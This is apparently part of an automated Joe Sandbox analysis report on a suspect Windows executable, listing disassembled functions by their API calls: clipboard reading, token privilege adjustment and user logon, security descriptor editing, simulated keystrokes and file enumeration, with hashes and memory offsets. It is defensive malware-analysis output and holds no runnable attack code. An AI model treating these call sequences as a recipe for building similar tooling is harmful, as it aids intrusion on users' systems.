                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CreateErrorFileLast
                                                                • String ID:
                                                                • API String ID: 1214770103-0
                                                                • Opcode ID: a1435d549a1d06971daad3b8b018f10b77ea79de8938fd2d8f519f52af33cd95
                                                                • Instruction ID: 4f1e121a4f3be9367cb703a581145557debeeffcd0f8f92c657ee1bafb389034
                                                                • Opcode Fuzzy Hash: a1435d549a1d06971daad3b8b018f10b77ea79de8938fd2d8f519f52af33cd95
                                                                • Instruction Fuzzy Hash: 0D81B130648701DFCB19EF28C495AA9B7E1BF88350F14451DF89A5B2D2DB38ED85CB52
                                                                APIs
                                                                • Sleep.KERNELBASE(000001F4), ref: 01321AE9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                • Instruction ID: f4ec0e5338f786b0f7957cc33ab1c51c78de61d1910edbea0926ee4444310fc9
                                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                • Instruction Fuzzy Hash: F1E0BF7494410DEFDB00EFA4D6496DD7BB4EF04312F1005A1FD05D7680DB309E54CA62
                                                                APIs
                                                                • CloseHandle.KERNELBASE(?,?,00000000,007524E0), ref: 00716266
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle
                                                                • String ID:
                                                                • API String ID: 2962429428-0
                                                                • Opcode ID: 0d56b18cc459581b3ac193774e169d8d7f5903bf1bb7bea5e55a3a9cfab791b1
                                                                • Instruction ID: 52dbcffb97cc21996fdc3dd714e2172348144fde6e61746ee4dec2fa142883e4
                                                                • Opcode Fuzzy Hash: 0d56b18cc459581b3ac193774e169d8d7f5903bf1bb7bea5e55a3a9cfab791b1
                                                                • Instruction Fuzzy Hash: DFE09275400B01DEC7314F1AE804492FBF5FEE13613218A2ED0E5926A4D7B85886CB50
                                                                APIs
                                                                • Sleep.KERNELBASE(000001F4), ref: 01321AE9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                • Instruction ID: c9c82b7e4de0e2ecec84c4f2d9af45354f7a3b674244158596a6fafa2d9d9525
                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                • Instruction Fuzzy Hash: 20E0E67494410DDFDB00EFB4D6496DD7BB4EF04302F100161FD01D2280D7309D50CA62
                                                                APIs
                                                                  • Part of subcall function 00729BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00729BB2
                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007A961A
                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007A965B
                                                                • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 007A969F
                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007A96C9
                                                                • SendMessageW.USER32 ref: 007A96F2
                                                                • GetKeyState.USER32(00000011), ref: 007A978B
                                                                • GetKeyState.USER32(00000009), ref: 007A9798
                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007A97AE
                                                                • GetKeyState.USER32(00000010), ref: 007A97B8
                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007A97E9
                                                                • SendMessageW.USER32 ref: 007A9810
                                                                • SendMessageW.USER32(?,00001030,?,007A7E95), ref: 007A9918
                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007A992E
                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007A9941
                                                                • SetCapture.USER32(?), ref: 007A994A
                                                                • ClientToScreen.USER32(?,?), ref: 007A99AF
                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007A99BC
                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007A99D6
                                                                • ReleaseCapture.USER32 ref: 007A99E1
                                                                • GetCursorPos.USER32(?), ref: 007A9A19
                                                                • ScreenToClient.USER32(?,?), ref: 007A9A26
                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 007A9A80
                                                                • SendMessageW.USER32 ref: 007A9AAE
                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 007A9AEB
                                                                • SendMessageW.USER32 ref: 007A9B1A
                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007A9B3B
                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 007A9B4A
                                                                • GetCursorPos.USER32(?), ref: 007A9B68
                                                                • ScreenToClient.USER32(?,?), ref: 007A9B75
                                                                • GetParent.USER32(?), ref: 007A9B93
                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 007A9BFA
                                                                • SendMessageW.USER32 ref: 007A9C2B
                                                                • ClientToScreen.USER32(?,?), ref: 007A9C84
                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007A9CB4
                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 007A9CDE
                                                                • SendMessageW.USER32 ref: 007A9D01
                                                                • ClientToScreen.USER32(?,?), ref: 007A9D4E
                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007A9D82
                                                                  • Part of subcall function 00729944: GetWindowLongW.USER32(?,000000EB), ref: 00729952
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 007A9E05
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                • String ID: @GUI_DRAGID$F$p#~
                                                                • API String ID: 3429851547-1555356086
                                                                • Opcode ID: 4885b6d7538bac5e861c3c6e8a6ef7390ae812d9587ce96d4f1f5b08348411d1
                                                                • Instruction ID: 6a82f58d750d80f826d47a86aeee34baf1f2e70868d32edbe6bfb59c7a7a74e7
                                                                • Opcode Fuzzy Hash: 4885b6d7538bac5e861c3c6e8a6ef7390ae812d9587ce96d4f1f5b08348411d1
                                                                • Instruction Fuzzy Hash: DF429D34605240EFD725CF24CC88EAABBE5FF8A320F144659F699872A1D739E860CF55
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 007A48F3
                                                                • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 007A4908
                                                                • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 007A4927
                                                                • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 007A494B
                                                                • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 007A495C
                                                                • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 007A497B
                                                                • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 007A49AE
                                                                • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 007A49D4
                                                                • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 007A4A0F
                                                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 007A4A56
                                                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 007A4A7E
                                                                • IsMenu.USER32(?), ref: 007A4A97
                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007A4AF2
                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007A4B20
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 007A4B94
                                                                • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 007A4BE3
                                                                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 007A4C82
                                                                • wsprintfW.USER32 ref: 007A4CAE
                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007A4CC9
                                                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 007A4CF1
                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007A4D13
                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007A4D33
                                                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 007A4D5A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                • String ID: %d/%02d/%02d
                                                                • API String ID: 4054740463-328681919
                                                                • Opcode ID: 90b8f79fa7530de59787143d32536e04b7c1145ad3d2c4efbd21cea40bd0b838
                                                                • Instruction ID: 30c6300bd6b80a34e4908a5955d2e2492ee48131dc943114950bd07f17795a1d
                                                                • Opcode Fuzzy Hash: 90b8f79fa7530de59787143d32536e04b7c1145ad3d2c4efbd21cea40bd0b838
                                                                • Instruction Fuzzy Hash: 7F12D071600214ABEB258F28DC49FAE7BF8EFC6310F144269F516EA1E1DBBD9940CB50
                                                                APIs
                                                                • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0072F998
                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0076F474
                                                                • IsIconic.USER32(00000000), ref: 0076F47D
                                                                • ShowWindow.USER32(00000000,00000009), ref: 0076F48A
                                                                • SetForegroundWindow.USER32(00000000), ref: 0076F494
                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0076F4AA
                                                                • GetCurrentThreadId.KERNEL32 ref: 0076F4B1
                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0076F4BD
                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0076F4CE
                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0076F4D6
                                                                • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0076F4DE
                                                                • SetForegroundWindow.USER32(00000000), ref: 0076F4E1
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0076F4F6
                                                                • keybd_event.USER32(00000012,00000000), ref: 0076F501
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0076F50B
                                                                • keybd_event.USER32(00000012,00000000), ref: 0076F510
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0076F519
                                                                • keybd_event.USER32(00000012,00000000), ref: 0076F51E
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0076F528
                                                                • keybd_event.USER32(00000012,00000000), ref: 0076F52D
                                                                • SetForegroundWindow.USER32(00000000), ref: 0076F530
                                                                • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0076F557
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                • String ID: Shell_TrayWnd
                                                                • API String ID: 4125248594-2988720461
                                                                • Opcode ID: ad45ca6c94f6a93eea2836f35a993232b7eee342b020b3f77d46d15c4c93711b
                                                                • Instruction ID: c74e06e898cf58708ede0b832b91664226dcd9e869fee5993b54badd4cbcc2b9
                                                                • Opcode Fuzzy Hash: ad45ca6c94f6a93eea2836f35a993232b7eee342b020b3f77d46d15c4c93711b
                                                                • Instruction Fuzzy Hash: C3318671A40218BFEB216BB55C4AFBF7E6CEB85B50F204065FA01F61D1CBB85D10AE64
                                                                APIs
                                                                  • Part of subcall function 007716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0077170D
                                                                  • Part of subcall function 007716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0077173A
                                                                  • Part of subcall function 007716C3: GetLastError.KERNEL32 ref: 0077174A
                                                                • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00771286
                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 007712A8
                                                                • CloseHandle.KERNEL32(?), ref: 007712B9
                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007712D1
                                                                • GetProcessWindowStation.USER32 ref: 007712EA
                                                                • SetProcessWindowStation.USER32(00000000), ref: 007712F4
                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00771310
                                                                  • Part of subcall function 007710BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007711FC), ref: 007710D4
                                                                  • Part of subcall function 007710BF: CloseHandle.KERNEL32(?,?,007711FC), ref: 007710E9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                • String ID: $default$winsta0$Z}
                                                                • API String ID: 22674027-3716028957
                                                                • Opcode ID: d916bdfecdf4bc84655219d34e19bdda55d8c924d91e9b12d9161311f34a5c08
                                                                • Instruction ID: d3b4d6251fc08764519caa10097faab7ddcc3c74bb6bbace1a1b9e2037359d67
                                                                • Opcode Fuzzy Hash: d916bdfecdf4bc84655219d34e19bdda55d8c924d91e9b12d9161311f34a5c08
                                                                • Instruction Fuzzy Hash: 1581AB71A00248BFDF218FA8DC49FEE7BB9EF45744F14C129F918A62A0D7388944CB65
                                                                APIs
                                                                  • Part of subcall function 007710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00771114
                                                                  • Part of subcall function 007710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00770B9B,?,?,?), ref: 00771120
                                                                  • Part of subcall function 007710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00770B9B,?,?,?), ref: 0077112F
                                                                  • Part of subcall function 007710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00770B9B,?,?,?), ref: 00771136
                                                                  • Part of subcall function 007710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0077114D
                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00770BCC
                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00770C00
                                                                • GetLengthSid.ADVAPI32(?), ref: 00770C17
                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00770C51
                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00770C6D
                                                                • GetLengthSid.ADVAPI32(?), ref: 00770C84
                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00770C8C
                                                                • HeapAlloc.KERNEL32(00000000), ref: 00770C93
                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00770CB4
                                                                • CopySid.ADVAPI32(00000000), ref: 00770CBB
                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00770CEA
                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00770D0C
                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00770D1E
                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00770D45
                                                                • HeapFree.KERNEL32(00000000), ref: 00770D4C
                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00770D55
                                                                • HeapFree.KERNEL32(00000000), ref: 00770D5C
                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00770D65
                                                                • HeapFree.KERNEL32(00000000), ref: 00770D6C
                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00770D78
                                                                • HeapFree.KERNEL32(00000000), ref: 00770D7F
                                                                  • Part of subcall function 00771193: GetProcessHeap.KERNEL32(00000008,00770BB1,?,00000000,?,00770BB1,?), ref: 007711A1
                                                                  • Part of subcall function 00771193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00770BB1,?), ref: 007711A8
                                                                  • Part of subcall function 00771193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00770BB1,?), ref: 007711B7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                • String ID:
                                                                • API String ID: 4175595110-0
                                                                • Opcode ID: 28f3d4fc6f9c1a95f6163a31f2b6b251e1c4e60423151022542d778f4d71e806
                                                                • Instruction ID: a79a72d81b488964055420e2883e5a6b6d4bd599990f97b037976d16129a087d
                                                                • Opcode Fuzzy Hash: 28f3d4fc6f9c1a95f6163a31f2b6b251e1c4e60423151022542d778f4d71e806
                                                                • Instruction Fuzzy Hash: 12715C71A0020AFBDF11DFA4DC49BEEBBB8BF45340F048515E919A6291D779A905CFA0
                                                                APIs
                                                                • OpenClipboard.USER32(007ACC08), ref: 0078EB29
                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0078EB37
                                                                • GetClipboardData.USER32(0000000D), ref: 0078EB43
                                                                • CloseClipboard.USER32 ref: 0078EB4F
                                                                • GlobalLock.KERNEL32(00000000), ref: 0078EB87
                                                                • CloseClipboard.USER32 ref: 0078EB91
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0078EBBC
                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0078EBC9
                                                                • GetClipboardData.USER32(00000001), ref: 0078EBD1
                                                                • GlobalLock.KERNEL32(00000000), ref: 0078EBE2
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0078EC22
                                                                • IsClipboardFormatAvailable.USER32(0000000F), ref: 0078EC38
                                                                • GetClipboardData.USER32(0000000F), ref: 0078EC44
                                                                • GlobalLock.KERNEL32(00000000), ref: 0078EC55
                                                                • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0078EC77
                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0078EC94
                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0078ECD2
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0078ECF3
                                                                • CountClipboardFormats.USER32 ref: 0078ED14
                                                                • CloseClipboard.USER32 ref: 0078ED59
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                • String ID:
                                                                • API String ID: 420908878-0
                                                                • Opcode ID: 0bab003d0e0320b9390f0a55d49cbc6ea106e04e9e5cf06a8ebadb4c11ce8279
                                                                • Instruction ID: 7ff2d144c836c6dbad879efa604d19d99da0c70b2948f4a286ddd7a8435cb60c
                                                                • Opcode Fuzzy Hash: 0bab003d0e0320b9390f0a55d49cbc6ea106e04e9e5cf06a8ebadb4c11ce8279
                                                                • Instruction Fuzzy Hash: 2661EF74244201EFD301EF24C889F6ABBE4AF85714F088519F456872E2DB39ED4ACB62
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 007869BE
                                                                • FindClose.KERNEL32(00000000), ref: 00786A12
                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00786A4E
                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00786A75
                                                                  • Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD
                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00786AB2
                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00786ADF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                • API String ID: 3830820486-3289030164
                                                                • Opcode ID: cf8b748459957dd9c0c86c75dfef3e44e39371ed1415dfe65c921c299ee27914
                                                                • Instruction ID: 7ffda116ebeb2cbccff88cbb81b9775a738d55b85e881619ee921dade9aafed1
                                                                • Opcode Fuzzy Hash: cf8b748459957dd9c0c86c75dfef3e44e39371ed1415dfe65c921c299ee27914
                                                                • Instruction Fuzzy Hash: D8D15FB2508340AFC314EBA4D896EABB7FCAF88704F04491DF585D7191EB78DA45CB62
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00789663
                                                                • GetFileAttributesW.KERNEL32(?), ref: 007896A1
                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 007896BB
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 007896D3
                                                                • FindClose.KERNEL32(00000000), ref: 007896DE
                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 007896FA
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0078974A
                                                                • SetCurrentDirectoryW.KERNEL32(007D6B7C), ref: 00789768
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00789772
                                                                • FindClose.KERNEL32(00000000), ref: 0078977F
                                                                • FindClose.KERNEL32(00000000), ref: 0078978F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                • String ID: *.*
                                                                • API String ID: 1409584000-438819550
                                                                • Opcode ID: 93c6126d0f99e7c40292689ab43ee0ee243e72afea715aac616d014d1b76eb01
                                                                • Instruction ID: 858c53429e59d10ad98046e1903c59807454d7089f3e72114eb0827220df6c2d
                                                                • Opcode Fuzzy Hash: 93c6126d0f99e7c40292689ab43ee0ee243e72afea715aac616d014d1b76eb01
                                                                • Instruction Fuzzy Hash: 6831D5726802197EDF11AFB4DC08AEE77ACAF4A320F188156F905E2190EB3CDE408B54
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 007897BE
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00789819
                                                                • FindClose.KERNEL32(00000000), ref: 00789824
